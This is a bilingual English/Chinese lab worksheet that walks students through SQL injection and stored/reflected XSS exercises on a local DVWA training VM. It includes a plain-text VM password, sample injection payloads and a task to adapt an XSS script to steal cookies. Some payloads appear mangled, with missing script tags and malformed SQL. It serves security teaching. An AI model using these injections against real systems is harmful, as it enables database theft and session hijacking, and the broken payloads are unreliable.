Damn Vulnerable Web Application, shorter DVWA, is a purpose-built vulnerable PHP/MySQL web application. The main goal of this training platform is to aid penetration testers and security professionals in testing their skills and tools. In addition, it can aid web developers in better understanding how to secure web applications, but also to aid students/teachers in learning all about web app security and possible vulnerabilities. Damn Vulnerable Web Application,简称 DVWA,是一个专门构建的易受攻击的 PHP/MySQL Web 应用程序。这个培训平台的主要目标是帮助渗透测试人员和安全专业人员测试他们的技能和工具。此外,它可以帮助 Web 开发人员更好地了解如何保护 Web 应用程序,还可以帮助学生/教师学习有关 Web 应用程序安全和可能的漏洞的所有知识。
Your tutor will give you the connection details to the DVWA VM. 您的导师将为您提供连接到 DVWA 虚拟机的详细信息。
You can connect to the machine using RDP. 您可以使用 RDP 连接到该计算机。
The password to the machine is Csec5616. 机器的密码是 Csec5616。
You can launch the browser in the VM and enter the web address as localhost to access DVWA. 您可以在虚拟机中启动浏览器,并输入本地主机地址以访问 DVWA。
Once you login verify the security level of DVWA under DVWA Security. It has to be set to Low. 登录后,请在 DVWA 安全性下验证 DVWA 的安全级别。必须设置为低。
(Optional) For your own experiments, you can download DVWA from here. (可选)为了您自己的实验,您可以从这里下载 DVWA。
(Optional) Configuration instructions can be found here. (可选)配置说明可以在这里找到。
Task 1 - SQL Injection Attacks 任务 1 - SQL 注入攻击
Your tutor will explain what an SQL injection attack is. 您的导师将解释什么是 SQL 注入攻击。
Goto the corresponding part of the DVWA in SQL injection at try the following. 转到 DVWA 中 SQL 注入的相应部分,尝试以下操作。
Enter etc. in the user ID field and notice that you will get information about a single user. This is the intended behaviour of the program. 在用户 ID 字段中输入 等内容,注意您将获得有关单个用户的信息。这是程序的预期行为。
Now enter %' or '0'='0. What do you see? Can you explain the results? 现在输入%'或'0'='0。你看到了什么?你能解释一下结果吗?
Try ' or union select null, version() #. What do you see? Can you explain the results? 尝试 '或 union select null, version()#。你看到了什么?你能解释一下结果吗?
Try ' or union select null, user() #. What do you see? Can you explain the results? 尝试 '或 union select null, user()#。你看到了什么?你能解释一下结果吗?
Now build the queries for following tasks. 现在为以下任务构建查询。
Display the database name 显示数据库名称
Display all tables in information_schema 显示 information_schema 中的所有表格
Display all the user tables in information_schema 显示 information_schema 中的所有用户表
Task 2 - XSS Attacks 任务 2 - XSS 攻击
Your tutor will explain what XSS attacks. 您的导师将解释什么是 XSS 攻击。
What are two types of XSS arracks? 什么是两种 XSS 攻击类型?
Try to perform two types of XSS attacks on DVWA. 尝试在 DVWA 上执行两种 XSS 攻击类型。
Stored cross site scripting 存储型跨站脚本攻击
Goto XSS (Stored) 转到 XSS(存储)
Check the functionality of the Guestbook 检查留言板的功能
Enter something like alert() in the message part and observe how it is stored and replayed every time a visitor visit the page. 在消息部分输入类似 alert()的内容,并观察每次访问页面时如何存储和重放。
Reflected cross site scripting 反射型跨站脚本
Goto XSS (Reflected) 转到 XSS(反射型)
Check the functionality by entering a name 通过输入名称检查功能
Enter something like Samalert() in the textbox and observe what happens. 在文本框中输入类似于 Samalert() 的内容,观察会发生什么。
Change the script to obtain the cookie 更改脚本以获取 cookie